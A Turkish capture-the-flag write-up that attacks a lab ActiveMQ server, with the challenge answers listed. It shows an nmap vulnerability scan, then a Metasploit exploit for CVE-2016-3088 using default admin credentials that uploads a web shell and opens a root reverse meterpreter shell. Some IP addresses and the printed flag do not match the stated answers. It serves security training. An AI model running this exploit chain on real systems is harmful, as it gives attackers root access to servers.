# Hack Web Services! Part - 3 ActiveMQ


**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta iç ağda bulunan servisleri test etmeniz istendi. Bugün ActiveMQ çalıştıran sistemin güvenliğini test edeceksiniz.

Apache ActiveMQ, eksiksiz bir Java İleti Hizmeti istemcisiyle birlikte Java'da yazılmış açık kaynaklı bir ileti aracısıdır.  Bu durumda, birden fazla istemci veya sunucudan gelen iletişimi teşvik etmek anlamına gelen "Kurumsal Özellikler" sağlar.


***Amaç***:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Çalışan zaafiyetli servisin versiyonunu bulmak.
- Zaafiyetli servisin CVE ID'sini bulmak.
- Server'ı ele geçirmek.

**Flags**:
- Hedefte açık olan toplam port sayısı?
    - answer: **7**
- Vulnerable servisin port numarası?
    - answer: **8161**
- Vulnerable servisin ismi?
    - answer: **ActiveMQ OpenWire transport**
- Servise ait CVE?
    - answer: **CVE-2016-3088**
- flag.txt?
    - answer: **CyberPath{q3BkMsEEmj4jbHnw}**

## **Solution**:

### **Enum**:

```
attacker@cyberpath:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Videos
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 679  bytes 45631 (45.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 481  bytes 1095890 (1.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 995  bytes 1125717 (1.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 995  bytes 1125717 (1.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.26 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-08 11:14 UTC
Nmap scan report for activemq_2_web_1.activemq_2_internal_network (10.0.0.40)
Host is up (0.000071s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE    VERSION
1883/tcp  open  mqtt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mqtt-subscribe: ERROR: Script execution failed (use -d to debug)
5672/tcp  open  amqp?
|_amqp-info: ERROR: AMQP:handshake connection closed unexpectedly while reading frame header
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GetRequest, HTTPOptions, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|_    AMQP
8161/tcp  open  http       Jetty 8.1.16.v20140903
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /admin/: Possible admin folder (401 Unauthorized)
|   /admin/admin/: Possible admin folder (401 Unauthorized)
|   /admin/account.php: Possible admin folder (401 Unauthorized)
|   /admin/index.php: Possible admin folder (401 Unauthorized)
|   /admin/login.php: Possible admin folder (401 Unauthorized)
|   /admin/admin.php: Possible admin folder (401 Unauthorized)
|   /admin/index.html: Possible admin folder (401 Unauthorized)
|   /admin/login.html: Possible admin folder (401 Unauthorized)
|   /admin/admin.html: Possible admin folder (401 Unauthorized)
|   /admin/home.php: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.php: Possible admin folder (401 Unauthorized)
|   /admin/account.html: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.html: Possible admin folder (401 Unauthorized)
|   /admin/cp.php: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.php: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.php: Possible admin folder (401 Unauthorized)
|   /admin/home.html: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.html: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.html: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.html: Possible admin folder (401 Unauthorized)
|   /admin/cp.html: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.php: Possible admin folder (401 Unauthorized)
|   /admin/account.cfm: Possible admin folder (401 Unauthorized)
|   /admin/index.cfm: Possible admin folder (401 Unauthorized)
|   /admin/login.cfm: Possible admin folder (401 Unauthorized)
|   /admin/admin.cfm: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.cfm: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.cfm: Possible admin folder (401 Unauthorized)
|   /admin/cp.cfm: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.cfm: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.cfm: Possible admin folder (401 Unauthorized)
|   /admin/home.cfm: Possible admin folder (401 Unauthorized)
|   /admin/account.asp: Possible admin folder (401 Unauthorized)
|   /admin/index.asp: Possible admin folder (401 Unauthorized)
|   /admin/login.asp: Possible admin folder (401 Unauthorized)
|   /admin/admin.asp: Possible admin folder (401 Unauthorized)
|   /admin/home.asp: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.asp: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.asp: Possible admin folder (401 Unauthorized)
|   /admin/cp.asp: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.asp: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.asp: Possible admin folder (401 Unauthorized)
|   /admin/account.aspx: Possible admin folder (401 Unauthorized)
|   /admin/index.aspx: Possible admin folder (401 Unauthorized)
|   /admin/login.aspx: Possible admin folder (401 Unauthorized)
|   /admin/admin.aspx: Possible admin folder (401 Unauthorized)
|   /admin/home.aspx: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.aspx: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.aspx: Possible admin folder (401 Unauthorized)
|   /admin/cp.aspx: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.aspx: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.aspx: Possible admin folder (401 Unauthorized)
|   /account.jsp: Possible admin folder (401 Unauthorized)
|   /admin/index.jsp: Possible admin folder (401 Unauthorized)
|   /admin/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/admin.jsp: Possible admin folder (401 Unauthorized)
|   /admin_area/admin.jsp: Possible admin folder (401 Unauthorized)
|   /admin_area/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin_area/index.jsp: Possible admin folder (401 Unauthorized)
|   /bb-admin/index.jsp: Possible admin folder (401 Unauthorized)
|   /bb-admin/login.jsp: Possible admin folder (401 Unauthorized)
|   /bb-admin/admin.jsp: Possible admin folder (401 Unauthorized)
|   /admin/home.jsp: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.jsp: Possible admin folder (401 Unauthorized)
|   /admin.jsp: Possible admin folder (401 Unauthorized)
|   /pages/admin/admin-login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.jsp: Possible admin folder (401 Unauthorized)
|   /admin-login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/cp.jsp: Possible admin folder (401 Unauthorized)
|   /cp.jsp: Possible admin folder (401 Unauthorized)
|   /administrator/account.jsp: Possible admin folder (401 Unauthorized)
|   /administrator.jsp: Possible admin folder (401 Unauthorized)
|   /login.jsp: Possible admin folder (401 Unauthorized)
|   /modelsearch/login.jsp: Possible admin folder (401 Unauthorized)
|   /moderator.jsp: Possible admin folder (401 Unauthorized)
|   /moderator/login.jsp: Possible admin folder (401 Unauthorized)
|   /administrator/login.jsp: Possible admin folder (401 Unauthorized)
|   /moderator/admin.jsp: Possible admin folder (401 Unauthorized)
|   /controlpanel.jsp: Possible admin folder (401 Unauthorized)
|   /user.jsp: Possible admin folder (401 Unauthorized)
|   /admincp/index.jsp: Possible admin folder (401 Unauthorized)
|   /admincp/login.jsp: Possible admin folder (401 Unauthorized)
|   /admincontrol.jsp: Possible admin folder (401 Unauthorized)
|   /admin/account.jsp: Possible admin folder (401 Unauthorized)
|   /adminpanel.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin/index.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin/admin.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.jsp: Possible admin folder (401 Unauthorized)
|   /admin_login.jsp: Possible admin folder (401 Unauthorized)
|   /panel-administracion/login.jsp: Possible admin folder (401 Unauthorized)
|   /adminLogin.jsp: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.jsp: Possible admin folder (401 Unauthorized)
|   /home.jsp: Possible admin folder (401 Unauthorized)
|   /adminarea/index.jsp: Possible admin folder (401 Unauthorized)
|   /adminarea/admin.jsp: Possible admin folder (401 Unauthorized)
|   /adminarea/login.jsp: Possible admin folder (401 Unauthorized)
|   /panel-administracion/index.jsp: Possible admin folder (401 Unauthorized)
|   /panel-administracion/admin.jsp: Possible admin folder (401 Unauthorized)
|   /modelsearch/index.jsp: Possible admin folder (401 Unauthorized)
|   /modelsearch/admin.jsp: Possible admin folder (401 Unauthorized)
|   /administrator/index.jsp: Possible admin folder (401 Unauthorized)
|   /admincontrol/login.jsp: Possible admin folder (401 Unauthorized)
|   /adm/admloginuser.jsp: Possible admin folder (401 Unauthorized)
|   /admloginuser.jsp: Possible admin folder (401 Unauthorized)
|   /admin2.jsp: Possible admin folder (401 Unauthorized)
|   /admin2/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin2/index.jsp: Possible admin folder (401 Unauthorized)
|   /adm/index.jsp: Possible admin folder (401 Unauthorized)
|   /adm.jsp: Possible admin folder (401 Unauthorized)
|   /adm_auth.jsp: Possible admin folder (401 Unauthorized)
|   /memberadmin.jsp: Possible admin folder (401 Unauthorized)
|   /administratorlogin.jsp: Possible admin folder (401 Unauthorized)
|   /siteadmin/login.jsp: Possible admin folder (401 Unauthorized)
|   /siteadmin/index.jsp: Possible admin folder (401 Unauthorized)
|   /administr8.jsp: Possible admin folder (401 Unauthorized)
|   /administracao.jsp: Possible admin folder (401 Unauthorized)
|   /administracion.jsp: Possible admin folder (401 Unauthorized)
|   /admins.jsp: Possible admin folder (401 Unauthorized)
|   /AdminLogin.jsp: Possible admin folder (401 Unauthorized)
|   /admin/backup/: Possible backup (401 Unauthorized)
|   /admin/download/backup.sql: Possible database backup (401 Unauthorized)
|   /atom.jsp: RSS or Atom feed (401 Unauthorized)
|   /rss.jsp: RSS or Atom feed (401 Unauthorized)
|   /login.jsp: Login page (401 Unauthorized)
|   /log.jsp: Logs (401 Unauthorized)
|   /logs.jsp: Logs (401 Unauthorized)
|   /admin/upload.php: Admin File Upload (401 Unauthorized)
|   /console/login/loginForm.jsp: Oracle WebLogic Server Administration Console (401 Unauthorized)
|   /admin/CiscoAdmin.jhtml: Cisco Collaboration Server (401 Unauthorized)
|   /intruvert/jsp/module/Login.jsp: McAfee Network Security Manager (401 Unauthorized)
|   /ReqWebHelp/advanced/workingSet.jsp: IBM Rational RequisitePro/ReqWebHelp (401 Unauthorized)
|   /mxportal/home/MxPortalFrames.jsp: HP Insight Manager (401 Unauthorized)
|   /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 (401 Unauthorized)
|   /happyaxis.jsp: Apache Axis2 (401 Unauthorized)
|   /web-console/ServerInfo.jsp: JBoss Console (401 Unauthorized)
|   /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS (401 Unauthorized)
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload (401 Unauthorized)
|   /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/FCKeditor File upload (401 Unauthorized)
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload (401 Unauthorized)
|   /admin/jscript/upload.php: Lizard Cart/Remote File upload (401 Unauthorized)
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload (401 Unauthorized)
|   /admin/jscript/upload.pl: Lizard Cart/Remote File upload (401 Unauthorized)
|   /admin/jscript/upload.asp: Lizard Cart/Remote File upload (401 Unauthorized)
|_  /admin/environment.xml: Moodle files (401 Unauthorized)
|_http-server-header: Jetty(8.1.16.v20140903)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
44039/tcp open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
61613/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:266)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:75)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:214)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:196)
|_    java.lang.Thread.run(Thread.java:722)
61614/tcp open  http       Jetty 8.1.16.v20140903
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Jetty(8.1.16.v20140903)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
61616/tcp open  apachemq   ActiveMQ OpenWire transport
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     MaxFrameSize
|     CacheSize
|     CacheEnabled
|     SizePrefixDisabled
|     MaxInactivityDurationInitalDelay
|     TcpNoDelayEnabled
|     MaxInactivityDuration
|     TightEncodingEnabled
|_    StackTraceEnabled
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5672-TCP:V=7.80%I=7%D=3/8%Time=62273A96%P=x86_64-pc-linux-gnu%r(Get
SF:Request,8,"AMQP\0\x01\0\0")%r(HTTPOptions,8,"AMQP\0\x01\0\0")%r(RTSPReq
SF:uest,8,"AMQP\0\x01\0\0")%r(RPCCheck,8,"AMQP\0\x01\0\0")%r(DNSVersionBin
SF:dReqTCP,8,"AMQP\0\x01\0\0")%r(DNSStatusRequestTCP,8,"AMQP\0\x01\0\0")%r
SF:(SSLSessionReq,8,"AMQP\0\x01\0\0")%r(TerminalServerCookie,8,"AMQP\0\x01
SF:\0\0")%r(TLSSessionReq,8,"AMQP\0\x01\0\0")%r(Kerberos,8,"AMQP\0\x01\0\0
SF:")%r(SMBProgNeg,8,"AMQP\0\x01\0\0")%r(X11Probe,8,"AMQP\0\x01\0\0")%r(Fo
SF:urOhFourRequest,8,"AMQP\0\x01\0\0")%r(LPDString,8,"AMQP\0\x01\0\0")%r(L
SF:DAPSearchReq,8,"AMQP\0\x01\0\0")%r(LDAPBindReq,8,"AMQP\0\x01\0\0")%r(SI
SF:POptions,8,"AMQP\0\x01\0\0")%r(LANDesk-RC,8,"AMQP\0\x01\0\0")%r(Termina
SF:lServer,8,"AMQP\0\x01\0\0")%r(NCP,8,"AMQP\0\x01\0\0")%r(NotesRPC,8,"AMQ
SF:P\0\x01\0\0")%r(WMSRequest,8,"AMQP\0\x01\0\0")%r(oracle-tns,8,"AMQP\0\x
SF:01\0\0")%r(ms-sql-s,8,"AMQP\0\x01\0\0")%r(afp,8,"AMQP\0\x01\0\0")%r(gio
SF:p,8,"AMQP\0\x01\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61613-TCP:V=7.80%I=7%D=3/8%Time=62273A96%P=x86_64-pc-linux-gnu%r(HE
SF:LP4STOMP,27F,"ERROR\ncontent-type:text/plain\nmessage:Unknown\x20STOMP\
SF:x20action:\x20HELP\n\norg\.apache\.activemq\.transport\.stomp\.Protocol
SF:Exception:\x20Unknown\x20STOMP\x20action:\x20HELP\n\tat\x20org\.apache\
SF:.activemq\.transport\.stomp\.ProtocolConverter\.onStompCommand\(Protoco
SF:lConverter\.java:266\)\n\tat\x20org\.apache\.activemq\.transport\.stomp
SF:\.StompTransportFilter\.onCommand\(StompTransportFilter\.java:75\)\n\ta
SF:t\x20org\.apache\.activemq\.transport\.TransportSupport\.doConsume\(Tra
SF:nsportSupport\.java:83\)\n\tat\x20org\.apache\.activemq\.transport\.tcp
SF:\.TcpTransport\.doRun\(TcpTransport\.java:214\)\n\tat\x20org\.apache\.a
SF:ctivemq\.transport\.tcp\.TcpTransport\.run\(TcpTransport\.java:196\)\n\
SF:tat\x20java\.lang\.Thread\.run\(Thread\.java:722\)\n\0\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61616-TCP:V=7.80%I=7%D=3/8%Time=62273A91%P=x86_64-pc-linux-gnu%r(NU
SF:LL,F4,"\0\0\0\xf0\x01ActiveMQ\0\0\0\n\x01\0\0\0\xde\0\0\0\t\0\x0cMaxFra
SF:meSize\x06\0\0\0\0\x06@\0\0\0\tCacheSize\x05\0\0\x04\0\0\x0cCacheEnable
SF:d\x01\x01\0\x12SizePrefixDisabled\x01\0\0\x20MaxInactivityDurationInita
SF:lDelay\x06\0\0\0\0\0\0'\x10\0\x11TcpNoDelayEnabled\x01\x01\0\x15MaxInac
SF:tivityDuration\x06\0\0\0\0\0\0u0\0\x14TightEncodingEnabled\x01\x01\0\x1
SF:1StackTraceEnabled\x01\x01");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 386.92 seconds
```


### **Explotation**:

```bash
attacker@cyberpath:~$ msfconsole 
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[!] The following modules could not be loaded!..-
[!] 	/opt/metasploit-framework/embedded/framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/attacker/.msf4/logs/framework.log for details.
                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v6.1.3-dev-                          ]
+ -- --=[ 2161 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log

msf6 > search activemq

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_activemq_upload_jsp             2016-06-01       excellent  No     ActiveMQ web shell upload
   1  exploit/windows/http/apache_activemq_traversal_upload     2015-08-19       excellent  Yes    Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload
   2  auxiliary/scanner/http/apache_activemq_traversal                           normal     No     Apache ActiveMQ Directory Traversal
   3  auxiliary/scanner/http/apache_activemq_source_disclosure                   normal     No     Apache ActiveMQ JSP Files Source Disclosure
   4  exploit/windows/browser/samsung_security_manager_put      2016-08-05       excellent  No     Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/browser/samsung_security_manager_put

msf6 > use 0
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options 

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   AutoCleanup    true             no        Remove web shells after callback is received
   BasicAuthPass  admin            yes       The password for the specified username
   BasicAuthUser  admin            yes       The username to authenticate as
   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8161             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.2         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/apache_activemq_upload_jsp) > set rhost 10.0.0.40
rhost => 10.0.0.26
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] Uploading http://10.0.0.26:8161//opt/activemq/webapps/api//TjLxTivkVJMLJx.jar
[*] Uploading http://10.0.0.26:8161//opt/activemq/webapps/api//TjLxTivkVJMLJx.jsp
[*] Sending stage (58082 bytes) to 10.0.0.26
[+] Deleted /opt/activemq/webapps/api//TjLxTivkVJMLJx.jar
[+] Deleted /opt/activemq/webapps/api//TjLxTivkVJMLJx.jsp
[*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.26:47926) at 2022-03-08 11:29:03 +0000

meterpreter > getuid
Server username: root
meterpreter > pwd
/opt/apache-activemq-5.11.1
meterpreter > cd /
meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100777/rwxrwxrwx  0     fil   2022-03-08 11:28:26 +0000  .dockerenv
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  bin
40776/rwxrwxrw-   4096  dir   2017-11-19 15:25:10 +0000  boot
40776/rwxrwxrw-   360   dir   2022-03-08 11:28:26 +0000  dev
40776/rwxrwxrw-   4096  dir   2022-03-08 11:28:26 +0000  etc
100666/rw-rw-rw-  16    fil   2022-03-08 11:28:25 +0000  flag.txt
40776/rwxrwxrw-   4096  dir   2017-11-19 15:25:10 +0000  home
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  lib
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  lib64
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  media
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  mnt
40776/rwxrwxrw-   4096  dir   2019-04-26 16:28:31 +0000  opt
40776/rwxrwxrw-   0     dir   2022-03-08 11:28:26 +0000  proc
40776/rwxrwxrw-   4096  dir   2018-03-04 14:09:28 +0000  root
40776/rwxrwxrw-   4096  dir   2022-03-08 11:28:26 +0000  run
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  sbin
40776/rwxrwxrw-   4096  dir   2018-02-13 00:00:00 +0000  srv
40554/r-xr-xr--   0     dir   2022-03-08 11:28:26 +0000  sys
40776/rwxrwxrw-   4096  dir   2022-03-08 11:29:04 +0000  tmp
40776/rwxrwxrw-   4096  dir   2018-03-04 14:09:28 +0000  usr
40776/rwxrwxrw-   4096  dir   2018-03-04 14:09:28 +0000  var

meterpreter > cat flag.txt 
CyberPath{flag}
```